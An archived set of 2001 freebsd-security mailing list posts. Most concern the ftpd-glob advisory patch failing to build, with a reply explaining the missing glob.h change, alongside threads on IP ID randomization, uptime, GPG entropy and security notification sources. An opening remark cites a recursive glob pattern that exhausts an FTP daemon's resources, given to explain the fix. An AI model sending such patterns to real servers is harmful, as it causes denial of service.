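The metacharacter cap is the important one: a pattern such as */*/*/*/*/* makes glob(3) read every directory at every level before it can even count results, so a limit applied after expansion arrives too late. The post-expansion cap only bounds what the daemon keeps in memory and sends back.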
From: Fernando Schapachnik
Message-Id: <200104171942.QAA02034@ns1.via-net-works.net.ar>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd)
To: security@freebsd.org
Date: Tue, 17 Apr 2001 16:42:57 -0300 (ART)
Reply-To: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Is it just me, or does the patch against 4.2-REL say:

cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
-D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
-I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
/usr/src/lib/libc/../libc/gen/glob.c -o glob.o
/usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
/usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function)
/usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once
/usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.)
/usr/src/lib/libc/../libc/gen/glob.c: In function `globextend':
/usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function)
*** Error code 1

Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined?

TIA!

Fernando P. Schapachnik
Network and technology planning
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12:53:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from vms4.rit.edu (vms4.isc.rit.edu [129.21.3.15]) by hub.freebsd.org (Postfix) with ESMTP id 044A937B424 for ; Tue, 17 Apr 2001 12:53:33 -0700 (PDT) (envelope-from jrb4838@ritvax.isc.rit.edu) Received: from nazinet ([129.21.142.12]) by ritvax.isc.rit.edu (PMDF V5.2-32 #41784) with SMTP id <01K2IFQ5DXC207JLIH@ritvax.isc.rit.edu> for freebsd-security@freebsd.org; Tue, 17 Apr 2001 15:53:25 EDT Date: Tue, 17 Apr 2001 15:56:42 -0400 
From: Jason Burdick Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) To: freebsd-security@freebsd.org Message-id: <015c01c0c778$8676a7e0$0c8e1581@rh.rit.edu> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT X-Priority: 3 X-MSMail-priority: Normal References: <200104171942.QAA02034@ns1.via-net-works.net.ar> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just had the same output, a 'make clean' and another 'make all install' didn't work. ?? Jason Burdick Systems Admin - Nutty Hosting >Is it just me or the patch against 4.2-REL says: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) 
/usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:13:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id D94E937B423; Tue, 17 Apr 2001 13:13:09 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f3HKD0322697; Tue, 17 Apr 2001 13:13:00 -0700 (PDT) Date: Tue, 17 Apr 2001 13:13:00 -0700 
From: Alfred Perlstein
To: "Rodney W. Grimes"
Cc: Darren Reed , Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
Message-ID: <20010417131300.L976@fw.wintelcom.net>
References: <20010417043130.F976@fw.wintelcom.net> <200104171737.KAA56704@gndrsh.dnsmgr.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171737.KAA56704@gndrsh.dnsmgr.net>; from freebsd@gndrsh.dnsmgr.net on Tue, Apr 17, 2001 at 10:37:56AM -0700
X-all-your-base: are belong to us.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* Rodney W. Grimes [010417 10:37] wrote:
> > * Darren Reed [010417 04:29] wrote:
> > > In some mail from Julian Elischer, sie said:
> > > >
> > > > there is a site that calculates server uptime from these numbers.
> > > > All the leading machines are freeBSD. When you do this it will
> > > > no-longer be able to track us :-(
> > >
> > > IMHO, extraordinarily large uptimes are nothing to be proud of and
> > > say nothing about the quality of software.
> > >
> > > I'd almost go so far as to say uptimes greater than 1 year indicate
> > > that the system administration practises need review.
> >
> > Agreed.  I've yet to hear about any seriously deployed system
> > go without security advisories for over a year.
>
> Or perhaps this is a very talented system admin who values uptime
> and finds workarounds that don't involve downing a system that do
> just as good, and sometimes better, than the vendor fix for the
> security issue.
>
> Security Fix != Reboot required.

Well, I was the one that asked Jake if he could provide a system for
patching static functions in the kernel.  If you search the archives
there is a patch for doing this.

It's actually quite reasonable to patch code out from under a running
system.  One can replace the entry opcode of the function with a jump
to the patched code.
The only time this becomes a problem is when structures change, however backporting the fix shouldn't be a problem. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] Represent yourself, show up at BABUG http://www.babug.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:18: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from sabre.velocet.net (sabre.velocet.net [198.96.118.66]) by hub.freebsd.org (Postfix) with ESMTP id E7B6637B42C for ; Tue, 17 Apr 2001 13:17:59 -0700 (PDT) (envelope-from dgilbert@office.tor.velocet.net) Received: from office.tor.velocet.net (trooper.velocet.net [204.138.45.2]) by sabre.velocet.net (Postfix) with ESMTP id 4A7C0137F1C for ; Tue, 17 Apr 2001 16:17:59 -0400 (EDT) Received: (from dgilbert@localhost) by office.tor.velocet.net (8.11.2/8.9.3) id f3HKHw757137; Tue, 17 Apr 2001 16:17:58 -0400 (EDT) (envelope-from dgilbert) 
From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15068.42230.542567.656295@trooper.velocet.net> Date: Tue, 17 Apr 2001 16:17:58 -0400 (EDT) To: freebsd-security@freebsd.org Subject: ftp fix borked for 3.2. X-Mailer: VM 6.75 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would appear that the ftpd patch won't apply to 3.2 (the build fails). Anyone tried this (or is there a smaller patch?) Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:47:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 819D437B43F; Tue, 17 Apr 2001 13:47:03 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id GAA04095; Wed, 18 Apr 2001 06:46:57 +1000 (EST) 
From: Darren Reed
Message-Id: <200104172046.GAA04095@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
To: bright@wintelcom.net (Alfred Perlstein)
Date: Wed, 18 Apr 2001 06:46:57 +1000 (Australia/ACT)
Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
In-Reply-To: <20010417131300.L976@fw.wintelcom.net> from "Alfred Perlstein" at Apr 17, 2001 01:13:00 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Alfred Perlstein, sie said:
>
> * Rodney W. Grimes [010417 10:37] wrote:
> > > * Darren Reed [010417 04:29] wrote:
> > > > In some mail from Julian Elischer, sie said:
> > > > >
> > > > > there is a site that calculates server uptime from these numbers.
> > > > > All the leading machines are freeBSD. When you do this it will
> > > > > no-longer be able to track us :-(
> > > >
> > > > IMHO, extraordinarily large uptimes are nothing to be proud of and
> > > > say nothing about the quality of software.
> > > >
> > > > I'd almost go so far as to say uptimes greater than 1 year indicate
> > > > that the system administration practises need review.

[WARNING: major digression from security ahead]

I'm not talking (just) about security here.  I'm talking about systems
maintenance.

How long has your box been up?  How many changes to the system config
have been made since then?  If you're not there, and it reboots, will it
come up 100% functional?

Do your computers need some amount of preventative maintenance, like
internal cleaning to deal with dust build-up, etc.?  How many times do
unscheduled reboots result in hardware not spinning back up, and at an
inconvenient time?

Any non-trivial change to the startup (or bootup) sequence should be
tested, and how do you do that without a reboot?  Else where is the egg
when that "she'll be right mate" change fails at 9:00am on Monday morning
and you've slept in?

There is so much more to serious system admin (from your personal desktops
to mainframes) than just applying (security) patches and keeping it running
with no downtime.  Well, that is when you don't have hot-swap everything :)

None of my personal boxes have uptimes that ever exceed 6 months, even my
servers, but I have complete confidence in them rebooting and services
being restarted (modulo file system damage from an unclean shutdown).

Darren

From owner-freebsd-security  Tue Apr 17 13:48:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hq.stars.eu.org (pa54.bialystok.sdi.tpnet.pl [213.25.59.54]) by hub.freebsd.org (Postfix) with SMTP id 022DD37B43F for ; Tue, 17 Apr 2001 13:48:08 -0700 (PDT) (envelope-from spock@stars.eu.org)
Received: (qmail 63887 invoked by uid 1001); 17 Apr 2001 20:47:58 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Apr 2001 20:47:58 -0000
Date: Tue, 17 Apr 2001 22:47:58 +0200 (CEST)
From: Marcin Jurczuk To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Is it just me or the patch against 4.2-REL says: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 I try this on one 4.2-RELEASE and 4.2-STABLE - the results was as above Marcin Jurczuk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:57:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from router.pagearts.co.za (router.pagearts.co.za [196.25.102.154]) by hub.freebsd.org (Postfix) with ESMTP id 7072637B423 for ; Tue, 17 Apr 2001 13:56:56 -0700 (PDT) (envelope-from james@pagearts.co.za) Received: from boubou (localhost [127.0.0.1]) by router.pagearts.co.za (8.11.0/8.10.1) with SMTP id f3HKslx12664 for ; Tue, 17 Apr 2001 22:54:47 +0200 Message-ID: <026a01c0c780$e4ab3260$4501a8c0@boubou> 
From: "James Greenfield"
To:
Subject: GPG and "Not enough random bytes available"
Date: Tue, 17 Apr 2001 22:56:36 +0200
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Content-type: multipart/mixed; boundary="=_IS_MIME_Boundary"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've just installed GPG 1.0.4 on FreeBSD 4.2-RELEASE.  Any attempt to
generate a keypair results in a message to the effect of "Not enough random
bytes available".  Regardless of how much work I make the system do, it
doesn't seem to do anything more; GPG just sits there with a blank
expression on its face.

Some searches on the Web seem to indicate a possible patch to clock.c that
may be the cause of this problem?

What's of some concern to me is that all the threads around this issue seem
to indicate that it should require no more than about 24 bytes of random
data, but the message displayed indicates that 300 bytes more are required.
This seems like an awful lot of random data.  The messages above also
seemed to indicate that a reboot may result in enough random data for a
couple of email messages, but that seems pretty drastic.
I realise that there are probably better places to search for this info, but I'm just getting into FreeBSD again and this is the first time I've been in a position where I can actively maintain a server that's online (admittedly not a particularly high profile one, but we've had a couple of people poking around already, nothing like learning on the job :) Regards James Greenfield --=_IS_MIME_Boundary-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14: 2: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 4C51237B423 for ; Tue, 17 Apr 2001 14:01:58 -0700 (PDT) (envelope-from petef@hex.databits.net) Received: (qmail 19631 invoked by uid 1001); 17 Apr 2001 21:03:03 -0000 Date: Tue, 17 Apr 2001 17:03:03 -0400 
From: Pete Fritchman
To: James Greenfield
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: GPG and "Not enough random bytes available"
Message-ID: <20010417170303.D17908@databits.net>
References: <026a01c0c780$e4ab3260$4501a8c0@boubou>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <026a01c0c780$e4ab3260$4501a8c0@boubou>; from james@pagearts.co.za on Tue, Apr 17, 2001 at 10:56:36PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

++ 17/04/01 22:56 +0200 - James Greenfield:
| Any attempt to generate a keypair results in a message to the effect of "Not
| enough random bytes available".

See rndcontrol(8); you can help generate entropy by using interrupts.  You
can also set rand_irqs to a space-delimited list of IRQs to feed to
rndcontrol at boot.

-pete

-- 
Pete Fritchman
Databits Network Services, Inc.
finger petef@databits.net for PGP key

From owner-freebsd-security  Tue Apr 17 14: 5:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 3DB9837B424 for ; Tue, 17 Apr 2001 14:05:27 -0700 (PDT) (envelope-from anderson@centtech.com)
Received: (from smap@localhost) by proxy.centtech.com (8.8.4/8.6.9) id QAA25420; Tue, 17 Apr 2001 16:04:52 -0500 (CDT)
Received: from sprint.centtech.com(10.177.173.31) by proxy.centtech.com via smap (V2.0/2.1+anti-relay+anti-spam) id xma025418; Tue, 17 Apr 01 16:04:23 -0500
Received: from centtech.com (shiva [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id QAA27363; Tue, 17 Apr 2001 16:04:23 -0500 (CDT)
Message-ID: <3ADCAFD7.C7CE4EF6@centtech.com>
Date: Tue, 17 Apr 2001 16:04:23 -0500
From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Marcin Jurczuk Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this belong on the "freebsd-security" mailing list? Marcin Jurczuk wrote: > > >Is it just me or the patch against 4.2-REL says: > > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > /usr/src/lib/libc/../libc/gen/glob.c -o glob.o > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared > (first use in this function) > /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier > is reported only once > /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it > appears in.) > /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': > /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared > (first use in this function) > *** Error code 1 > > I try this on one 4.2-RELEASE and 4.2-STABLE - the results was as above > > Marcin Jurczuk > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 Never have so many understood so little about so much. 
------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:13:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from zork.punq.net (punq.net [207.154.84.94]) by hub.freebsd.org (Postfix) with SMTP id 371BB37B422 for ; Tue, 17 Apr 2001 14:13:45 -0700 (PDT) (envelope-from marcus@zork.punq.net) Received: (qmail 3648 invoked by uid 1000); 17 Apr 2001 21:13:41 -0000 Date: Tue, 17 Apr 2001 14:13:41 -0700 
From: Marcus Reid To: freebsd-security@freebsd.org Subject: Latency of security notifications Message-ID: <20010417141340.A3580@blazingdot.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Coffee-Level: high Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi: When I joined the freebsd-security-notifications mailing list, I set it up so that I got paged when an email came in from it, and forwarded the email to my other mailboxes, thinking that it was the best source of early-warning information possible. However there's been a couple of recent vulnerabilities that I heard about from somewhere else first. What are the best sources for early-warning security notifications? -- Marcus Reid Blazingdot.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:14:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 5291337B424 for ; Tue, 17 Apr 2001 14:14:15 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id 8FBCF1367D; Tue, 17 Apr 2001 14:16:33 -0700 (PDT) Message-ID: <004e01c0c783$adb298e0$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: , "Marcin Jurczuk" Cc: References: <3ADCAFD7.C7CE4EF6@centtech.com> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) Date: Tue, 17 Apr 2001 14:16:32 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 
From: "Eric Anderson"
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd)

> Does this belong on the "freebsd-security" mailing list?

I think it does, it is regarding the possibility of a borked security patch.

> > Marcin Jurczuk wrote:
> > > Is it just me or the patch against 4.2-REL says:
> >
> > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
> > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
> > /usr/src/lib/libc/../libc/gen/glob.c -o glob.o
> > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
> > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared
> > (first use in this function)
> > /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier
> > is reported only once
> > /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it
> > appears in.)
> > /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend':
> > /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared
> > (first use in this function)
> > *** Error code 1
> >
> > I try this on one 4.2-RELEASE and 4.2-STABLE - the results were as above
> >
> > Marcin Jurczuk
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
> > --
> -------------------------------------------------------------------------------
> Eric Anderson        anderson@centtech.com
> Centaur Technology   (512) 418-5792
> Never have so many understood so little about so much.
> -------------------------------------------------------------------------------
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Tue Apr 17 14:14:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id C859637B424; Tue, 17 Apr 2001 14:14:45 -0700 (PDT) (envelope-from cdf.lists@fxp.org)
Received: by peitho.fxp.org (Postfix, from userid 1501) id AFDD613614; Tue, 17 Apr 2001 17:14:45 -0400 (EDT)
Date: Tue, 17 Apr 2001 17:14:45 -0400
From: Chris Faulhaber
To: Fernando Schapachnik
Cc: security@freebsd.org, stable@freebsd.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd)
Message-ID: <20010417171445.B4890@peitho.fxp.org>
References: <200104171942.QAA02034@ns1.via-net-works.net.ar>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Yylu36WmvOXNoKYn"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171942.QAA02034@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Tue, Apr 17, 2001 at 04:42:57PM -0300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--Yylu36WmvOXNoKYn
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Apr 17, 2001 at 04:42:57PM -0300, Fernando Schapachnik wrote:
> Is it just me or the patch against 4.2-REL says:
>
> cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
> -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
> /usr/src/lib/libc/../libc/gen/glob.c -o glob.o
> /usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
> /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared
> (first use in this function)
> /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier
> is reported only once
> /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it
> appears in.)
> /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend':
> /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared
> (first use in this function)
> *** Error code 1
>
>
> Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined?
>

The advisory patch is missing the glob.h patch along with the instruction to copy the resulting glob.h to /usr/include.
Quick fix is to either get the diff or entire file from http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, copy the resulting file to /usr/include and build. An updated advisory/diff should be available soon.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

--Yylu36WmvOXNoKYn
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: FreeBSD: The Power To Serve

iEYEARECAAYFAjrcskUACgkQObaG4P6BelDOsACgnKjBgcsVO2EyLI2zTaDtHm8Y
zqoAn01xi+hgoeUE0y9NIO+ippK9jl4U
=uCyf
-----END PGP SIGNATURE-----

--Yylu36WmvOXNoKYn--

From owner-freebsd-security Tue Apr 17 14:17:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.pace.edu (ntutil.pace.edu [205.232.111.9]) by hub.freebsd.org (Postfix) with ESMTP id 16BF137B443 for ; Tue, 17 Apr 2001 14:17:45 -0700 (PDT) (envelope-from js43064n@stmail.pace.edu)
Received: from stmail.pace.edu (205.232.111.7:4119) by smtp.pace.edu (LSMTP for Windows NT v1.1b) with SMTP id <0.A8898009@smtp.pace.edu>; Tue, 17 Apr 2001 17:17:44 -0400
Date: Tue, 17 Apr 2001 17:17:41 -0400
Message-Id: <200104171717.AA1124598422@stmail.pace.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "Jonathan Slivko"
Reply-To:
To: , Marcus Reid
Subject: Re: Latency of security notifications
X-Mailer:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Such as?

---------- Original Message ----------------------------------
From: Marcus Reid
Date: Tue, 17 Apr 2001 14:13:41 -0700

>Hi:
>
>When I joined the freebsd-security-notifications mailing list, I set it up
>so that I got paged when an email came in from it, and forwarded the email
>to my other mailboxes, thinking that it was the best source of early-warning
>information possible. However there's been a couple of recent vulnerabilities
>that I heard about from somewhere else first.
>
>What are the best sources for early-warning security notifications?
>
>--
>Marcus Reid
>Blazingdot.com
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>

--
~~~~
Jonathan M. Slivko
Systems Administrator, DataSyrge Internet Services
Global IRC Operator, AsylumNet IRC Network
~~~~
--

From owner-freebsd-security Tue Apr 17 14:18:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 3098A37B422 for ; Tue, 17 Apr 2001 14:18:49 -0700 (PDT) (envelope-from crist.clark@globalstar.com)
Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBYGIT00.I9Q; Tue, 17 Apr 2001 14:18:29 -0700
Message-ID: <3ADCB335.A36561F1@globalstar.com>
Date: Tue, 17 Apr 2001 14:18:45 -0700
From: "Crist Clark"
Organization: Globalstar LP
X-Mailer: Mozilla 4.77 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Marcus Reid
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Latency of security notifications
References: <20010417141340.A3580@blazingdot.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Marcus Reid wrote:
>
> Hi:
>
> When I joined the freebsd-security-notifications mailing list, I set it up
> so that I got paged when an email came in from it, and forwarded the email
> to my other mailboxes, thinking that it was the best source of early-warning
> information possible. However there's been a couple of recent vulnerabilities
> that I heard about from somewhere else first.
>
> What are the best sources for early-warning security notifications?

I think the ones you are referring to got widespread attention when they popped up on Bugtraq. However, I would not trigger my pager off of Bugtraq.

--
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited.
If you have received this e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Tue Apr 17 14:20:52 2001
Delivered-To: freebsd-security@freebsd.org
